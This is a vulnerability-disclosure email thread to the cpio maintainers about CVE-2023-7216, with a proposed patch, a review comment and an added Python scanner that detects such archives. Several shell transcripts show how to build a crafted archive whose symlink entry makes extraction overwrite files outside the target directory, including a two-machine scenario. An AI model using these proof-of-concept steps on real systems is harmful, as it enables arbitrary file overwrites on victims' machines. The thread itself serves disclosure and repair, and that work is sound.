Dear cpio maintainer:

This is a Red Hat community report on CVE-2023-7216: https://bugzilla.redhat.com/show_bug.cgi?id=2249901

CVE-2023-7216 can cause path traversal when opening a cpio archive, which can lead to malicious file overwrites in arbitrary directories. Red Hat's PoC for CVE-2023-7216 can be reproduced using the following method:

```
[root@localhost home]# mkdir testcpio
[root@localhost home]# ln -sf /tmp/ testcpio/tmp
[root@localhost home]# echo "TEST Traversal" > testcpio/tmpYtrav.txt
[root@localhost home]# cd testcpio/
[root@localhost testcpio]# ls | cpio -ov > ../trav.cpio
tmp
tmpYtrav.txt
1 block
[root@localhost testcpio]# cd ..
[root@localhost home]# sed -i s/"tmpY"/"tmp\/"/g trav.cpio
[root@localhost home]# cpio -i < trav.cpio
[root@localhost home]# cat /tmp/trav.txt
TEST Traversal
[root@localhost home]# cat tmp/trav.txt
TEST Traversal
```

Based on my understanding of the PoC and my analysis of CVE-2023-7216, I constructed two more PoC scenarios.
PoC1 can be reproduced using the following method. Machine A can use the tampered trav.cpio file to overwrite any file on machine B, which may lead to remote command execution.

```
Machine A
[root@localhostA home]# mkdir testcpio
[root@localhostA home]# ln -sf /tmp/ testcpio/tmp
[root@localhostA home]# echo "TEST Traversal" > testcpio/tmpYtrav.txt
[root@localhostA home]# cd testcpio/
[root@localhostA testcpio]# ls | cpio -ov > ../trav.cpio
tmp
tmpYtrav.txt
1 block
[root@localhost testcpio]# cd ..
[root@localhost home]# sed -i s/"tmpY"/"tmp\/"/g trav.cpio
```

Assume that machine A transfers files to machine B through scp or another file transfer method. CVE-2023-7216 is triggered when machine B opens trav.cpio:

```
Machine B
[root@localhostB home]# cpio -i < trav.cpio
[root@localhostB home]# cat /tmp/trav.txt
TEST Traversal
[root@localhostB home]# cat tmp/trav.txt
TEST Traversal
```

Impact of PoC1: This indicates that any cpio archive file that contains symlinks may cause security risks such as path traversal.

PoC2 can be reproduced using the following method:

```
[root@localhost home]# mkdir testcpio
[root@localhost home]# ln -sf /tmp/ testcpio/tmp
[root@localhost home]# echo "TEST Traversal" > testcpio/tmpYtrav.txt
[root@localhost home]# cd testcpio/
[root@localhost testcpio]# ls | cpio -ov > ../trav.cpio
tmp
tmpYtrav.txt
1 block
[root@localhost testcpio]# cd ..
[root@localhost home]# mkdir dirA
[root@localhost home]# sed -i s/"tmpY"/"tmp\/"/g trav.cpio
[root@localhost home]# cpio -i < trav.cpio -D /home/dirA
[root@localhost home]# cat /tmp/trav.txt
TEST Traversal
[root@localhost home]# cat dirA/tmp/trav.txt
TEST Traversal
```

Impact of PoC2: When the -D option is used, the cpio file is expected to be extracted into the specified directory. However, because of CVE-2023-7216, the file is also created in the symlinked directory, which is not what is expected. This is like CVE-2015-1197.
When the --no-absolute-filenames option is used, the extracted file should be created in the current directory instead of the symlinked directory.

First of all, I would like to discuss an issue with you: when CVE-2015-1197 was fixed, the copy_link () function was left generating symlinks directly through the symlink () function if the --no-absolute-filenames option is not used when processing symlinks. This means that in this case, cpio allows writing files into arbitrary directories through symlinks. Is this what cpio was designed for? I believe this design is the root cause of CVE-2023-7216.

If you think this is a reasonable design, please let me know your reasons and provide a solution for CVE-2023-7216. If you agree with me that cpio should not allow writing files into arbitrary directories through symlinks, then we can discuss my solution.

In my view, we cannot guarantee that a cpio archive does not contain any symlinks. We must handle every symlink during extraction in the same way as the fix for CVE-2015-1197 does. So I made a patch. I have attached the patch to this mail. If you have a better fix, please let me know.

I look forward to your feedback and suggestions.

Best Regards,
Peng

From 9cf2f601f9beec06b0e7b4fcf3f454195bff1b77 Mon Sep 17 00:00:00 2001
From: Peng <[email protected]>
Date: Thu, 29 Feb 2024 17:22:11 +0800
Subject: [PATCH] deafult use symlink_placeholder() to fix Path Traversal

---
 src/copyin.c | 26 +-------------------------
 1 file changed, 1 insertion(+), 25 deletions(-)

diff --git a/src/copyin.c b/src/copyin.c
index ace0a02..c454313 100644
--- a/src/copyin.c
+++ b/src/copyin.c
@@ -789,31 +789,7 @@ copyin_link (struct cpio_file_stat *file_hdr, int in_file_des) link_name = xstrdup (file_hdr->c_tar_linkname); } - if (no_abs_paths_flag) - symlink_placeholder (link_name, file_hdr->c_name, file_hdr); - else - { - res = UMASKED_SYMLINK (link_name, file_hdr->c_name, - file_hdr->c_mode); - if (res < 0 && create_dir_flag) - { - create_all_directories (file_hdr->c_name); - res = UMASKED_SYMLINK (link_name, file_hdr->c_name, file_hdr->c_mode); - } - if (res < 0) - symlink_error (link_name, file_hdr->c_name); - else if (!no_chown_flag) - { - uid_t uid = set_owner_flag ? set_owner : file_hdr->c_uid; - gid_t gid = set_group_flag ? set_group : file_hdr->c_gid; - if (lchown (file_hdr->c_name, uid, gid) < 0 && errno != EPERM) - chown_error_details (file_hdr->c_name, uid, gid); - } - - if (retain_time_flag) - set_file_times (-1, file_hdr->c_name, file_hdr->c_mtime, - file_hdr->c_mtime, AT_SYMLINK_NOFOLLOW); - } + symlink_placeholder (link_name, file_hdr->c_name, file_hdr); free (link_name); } -- 2.33.0 ------------------ Original ------------------ 
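Review bot: removing the whole else branch also drops the ownership and timestamp handling that the direct-symlink path applied (the lchown() call governed by no_chown_flag/set_owner_flag/set_group_flag, and the set_file_times() call governed by retain_time_flag), as well as the create_dir_flag retry through create_all_directories(); unless symlink_placeholder() and the code that later materialises the placeholders reapply c_uid/c_gid and c_mtime and create missing parent directories, symlinks extracted without --no-absolute-filenames silently lose those options. Please either confirm that the placeholder path restores them or move that logic there. With the branch gone, `res` is no longer assigned anywhere in this function, so if it is declared only for this use it should be removed to avoid an unused-variable warning, and the no_abs_paths_flag test is now dead here. Since the change makes deferred symlink creation unconditional for every archive, a user-visible behaviour change, the commit message should explain that and reference CVE-2023-7216, and the subject line typo "deafult" should be fixed.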
From: "Peng" <[email protected]>
Date: Thu, Feb 29, 2024 07:02 PM
To: "bug-cpio" <[email protected]>; "ntait" <[email protected]>; "gray" <[email protected]>; "mrehak" <[email protected]>
Subject: Re: Is there a fix for this CVE-2023-7216?

Dear cpio maintainer:

This is a Red Hat community report on CVE-2023-7216: https://bugzilla.redhat.com/show_bug.cgi?id=2249901

CVE-2023-7216 can cause path traversal when opening a cpio archive, which can lead to malicious file overwrites in arbitrary directories. Red Hat's PoC for CVE-2023-7216 can be reproduced using the following method:

```
[root@localhost home]# mkdir testcpio
[root@localhost home]# ln -sf /tmp/ testcpio/tmp
[root@localhost home]# echo "TEST Traversal" > testcpio/tmpYtrav.txt
[root@localhost home]# cd testcpio/
[root@localhost testcpio]# ls | cpio -ov > ../trav.cpio
tmp
tmpYtrav.txt
1 block
[root@localhost testcpio]# cd ..
[root@localhost home]# sed -i s/"tmpY"/"tmp\/"/g trav.cpio
[root@localhost home]# cpio -i < trav.cpio
[root@localhost home]# cat /tmp/trav.txt
TEST Traversal
[root@localhost home]# cat tmp/trav.txt
TEST Traversal
```

First of all, I would like to confirm with you: do you accept CVE-2023-7216? Is CVE-2023-7216 a bug, or is it the default behavior of the cpio software? If CVE-2023-7216 is a bug, I will try to provide a fix patch. Of course, if there is a better fix, please point it out.

CVE-2023-7216 is similar to CVE-2015-1197; both of them use a symlink to cause path traversal. The CVE-2015-1197 fix uses symlink_placeholder () to fix a path traversal issue in the --no-absolute-filenames scenario. However, CVE-2023-7216 proves that path traversal also exists in other scenarios. So I made a patch to fix CVE-2023-7216: copyin_link() should enable symlink_placeholder() by default, not only when the --no-absolute-filenames option is on.

I look forward to your feedback and suggestions.

Best Regards,
Peng

------------------ Original ------------------
From: "2773414454" <[email protected]>
Date: Tue, Feb 20, 2024 11:03 AM
To: "bug-cpio" <[email protected]>
Subject: Is there a fix for this CVE-2023-7216?

Dear cpio maintainer:

https://nvd.nist.gov/vuln/detail/CVE-2023-7216

NVD does not provide any related patch information. Is there a fix for cpio's CVE-2023-7216?

[1] If not, what is the repair plan for cpio?
[2] If yes, can you indicate which commits fix CVE-2023-7216?

peng
0001-deafult-use-symlink_placeholder-to-fix-Path-Traversa.patch.txt
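The thread's point is that an archive can carry a symlink entry and then a file entry whose path passes through that symlink, so that `cpio -i` writes outside the extraction directory. The following pre-extraction check is an added example written for this page; it is not code from the thread or from GNU cpio, and every name in it is the example's own. It parses the portable SVR4 "newc" cpio format (`cpio -o -H newc`), builds two constructed sample archives in memory that mirror the PoC (a symlink `tmp -> /tmp/` followed by `tmp/trav.txt`, and a benign variant), and flags any entry that is absolute, contains `..`, or whose path goes through a symlink stored earlier in the same archive, which is the condition the PoC exploits. The transcripts above were written with cpio's default output format, which this scanner does not parse; an archive must be in newc format for it to be checked.

```python
"""Pre-extraction check for cpio 'newc' archives.

Added example for the CVE-2023-7216 thread; not part of GNU cpio.  A symlink
stored earlier in the archive is treated as already present on disk, which is
how cpio -i (without --no-absolute-filenames) behaves in the thread's PoC.
"""
import posixpath

NEWC_MAGIC = b"070701"
S_IFMT, S_IFLNK, S_IFREG = 0o170000, 0o120000, 0o100000
HEADER_LEN = 110  # 6-byte magic + 13 fields of 8 hex digits


def _pad4(n):
    """Bytes needed to round n up to a multiple of 4 (newc alignment)."""
    return (4 - n % 4) % 4


def build_newc(entries):
    """Build a newc archive from (name, mode, data) tuples; appends TRAILER!!!."""
    out = bytearray()
    for ino, (name, mode, data) in enumerate(entries + [("TRAILER!!!", 0, b"")], 1):
        name_b = name.encode() + b"\0"
        # ino, mode, uid, gid, nlink, mtime, filesize, devmajor, devminor,
        # rdevmajor, rdevminor, namesize, check
        fields = [ino, mode, 0, 0, 1, 0, len(data), 0, 0, 0, 0, len(name_b), 0]
        hdr = NEWC_MAGIC + b"".join(b"%08X" % f for f in fields)
        out += hdr + name_b + b"\0" * _pad4(len(hdr) + len(name_b))
        out += data + b"\0" * _pad4(len(data))
    return bytes(out)


def parse_newc(blob):
    """Yield (name, mode, data) for each entry up to the TRAILER!!! record."""
    off = 0
    while True:
        if blob[off:off + 6] != NEWC_MAGIC:
            raise ValueError("bad newc magic at offset %d" % off)
        fields = [int(blob[off + 6 + 8 * i:off + 14 + 8 * i], 16) for i in range(13)]
        mode, filesize, namesize = fields[1], fields[6], fields[11]
        name_start = off + HEADER_LEN
        name = blob[name_start:name_start + namesize - 1].decode()  # strip NUL
        data_start = name_start + namesize + _pad4(HEADER_LEN + namesize)
        data = blob[data_start:data_start + filesize]
        off = data_start + filesize + _pad4(filesize)
        if name == "TRAILER!!!":
            return
        yield name, mode, data


def find_traversals(blob):
    """Return [(entry name, reason)] for entries that could escape the target dir."""
    symlinks = {}  # normalised archive path -> link target
    findings = []
    for name, mode, data in parse_newc(blob):
        norm = posixpath.normpath(name)
        if name.startswith("/"):
            findings.append((name, "absolute path"))
        if ".." in norm.split("/"):
            findings.append((name, "'..' component"))
        # Every proper prefix of the path is a directory cpio will descend into;
        # if that prefix was archived as a symlink, the write follows the link.
        parts = norm.split("/")
        for i in range(1, len(parts)):
            prefix = "/".join(parts[:i])
            if prefix in symlinks:
                findings.append((name, "passes through archived symlink %s -> %s"
                                 % (prefix, symlinks[prefix])))
                break
        if mode & S_IFMT == S_IFLNK:
            symlinks[norm] = data.decode(errors="replace")
    return findings


# Constructed samples mirroring the thread's PoC (not the thread's own files):
# the sed rewrite turned "tmpYtrav.txt" into "tmp/trav.txt" behind "tmp -> /tmp/".
MALICIOUS = build_newc([
    ("tmp", S_IFLNK | 0o777, b"/tmp/"),
    ("tmp/trav.txt", S_IFREG | 0o644, b"TEST Traversal\n"),
])
BENIGN = build_newc([
    ("tmp", S_IFLNK | 0o777, b"/tmp/"),
    ("tmpYtrav.txt", S_IFREG | 0o644, b"TEST Traversal\n"),
])

if __name__ == "__main__":
    for label, blob in (("malicious", MALICIOUS), ("benign", BENIGN)):
        print(label, find_traversals(blob))
```

The check mirrors what the proposed patch enforces at extraction time: if symlinks are only materialised after every other entry has been written (the symlink_placeholder approach), no file entry can be routed through a symlink from the same archive, so any entry this scanner flags for "passes through archived symlink" is one whose on-disk location would differ between the patched and unpatched extractor. Absolute names and `..` components are reported as well because they are the other two ways an archive name can leave the target directory.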
